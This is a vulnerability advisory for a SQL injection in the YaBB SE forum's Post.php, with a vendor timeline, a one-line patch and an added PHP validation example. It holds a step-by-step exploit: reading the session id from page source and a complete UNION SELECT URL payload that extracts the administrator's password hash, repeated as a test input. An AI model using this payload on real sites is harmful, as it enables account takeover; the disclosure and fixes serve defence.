Summary

YaBB SE is a PHP/MySQL port of the popular forum software YaBB (Yet Another Bulletin Board). An SQL injection vulnerability allows a remote attacker to execute malicious SQL statements on the database remotely.

Details

Vulnerable Systems:
* YaBB SE versions 1.5.4, 1.5.5, possibly others

The file Post.php is vulnerable to SQL injection because the quote parameter isn't checked against malicious input, so it is possible to inject SQL.

How To Exploit the vulnerability:

1- You need to be a registered user to exploit this hole.
2- Click any board you see, e.g. General Discussion.
3- Click any message, e.g. Welcome to YaBB SE!
4- Now view the source code of this page and search for the string "sesc" (without the quotes). This is the session id, a hex number of 32 characters, e.g. 13a478d8aa161c2231e6d3b36b6d19f2; you'll need this later.
5- Now your URL is something like this:
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- Change your URL to look like this:
http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
The value of sesc is the value you got before from the source code, and voilà: you get the hashed password of the user with id = 1 in the Subject text box, something like this:
Re:e320774659b1b23333bd033754d21bc4

Vendor Status:

January 23, 2004: I contacted the vendor.
January 23, 2004: Vendor says they are working on it.
January 29, 2004: I sent another email to know how the work was progressing. No response.
February 3, 2004: I sent another email to know the status of the work.
February 4, 2004: Vendor says they'll figure out how to do it.
February 16, 2004: I didn't want to keep waiting, so I published the vulnerability.

Temporal Solution:

Open Post.php and go to around line 49; you'll see something like this:

$quotemsg = $quote;

Change it to this:

if ( !is_numeric($quote) ) { die('Go out C==|=======>'); }
$quotemsg = $quote;

That's it.

Credits go to: BackSpace
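The temporal solution above stops the injection by refusing any quote value that is not numeric. The following is an added example, written for this page and not code from the advisory or from YaBB SE, showing a slightly stricter variant of that check and how it behaves on sample inputs. It assumes a hypothetical table yabbse_messages with an ID_MSG column for the quoted message; the function names and the sample inputs are constructed for illustration.

```php
<?php
// Added example (not part of the advisory or YaBB SE's code): stricter
// validation of the quote parameter than the advisory's is_numeric() check.

// Returns the quoted message ID as an int, or null if the input is not a
// plain non-negative decimal integer. Unlike is_numeric(), this rejects
// floats, exponent notation ("1e3"), leading whitespace and sign characters.
function quote_id_from_request($raw)
{
    if (!is_string($raw) || $raw === '' || !ctype_digit($raw)) {
        return null;
    }
    return (int) $raw;
}

// Builds the lookup query only from a validated integer, so the value that
// reaches MySQL can never contain quotes, parentheses or SQL keywords.
// Table and column names here are assumptions, not YaBB SE's real schema.
function build_quote_query($raw)
{
    $id = quote_id_from_request($raw);
    if ($id === null) {
        return null; // caller shows an error instead of running the query
    }
    return "SELECT subject, body FROM yabbse_messages WHERE ID_MSG = " . $id;
}

// Constructed sample inputs: a legitimate value, the shape of the payload
// from the advisory, and edge cases that is_numeric() alone would accept.
$samples = array(
    '12',
    '-12) UNION SELECT passwd,null FROM yabbse_members WHERE ID_MEMBER=1/*',
    '1e3',
    ' 12',
    '12.0',
);

foreach ($samples as $s) {
    $numeric = is_numeric($s) ? 'is_numeric=yes' : 'is_numeric=no ';
    $q = build_quote_query($s);
    printf("%-72s %s -> %s\n", var_export($s, true), $numeric,
           $q === null ? 'REJECTED' : $q);
}
```

Run with php on the command line. The injection string is rejected by both checks; "1e3", " 12" and "12.0" pass is_numeric() but are rejected here, since a message ID is only ever a plain integer. Neither form is exploitable once the check is in place, but the integer cast also guarantees the value interpolated into the query is exactly what the database expects. Returning null rather than calling die() lets the page render a normal error instead of aborting mid-request.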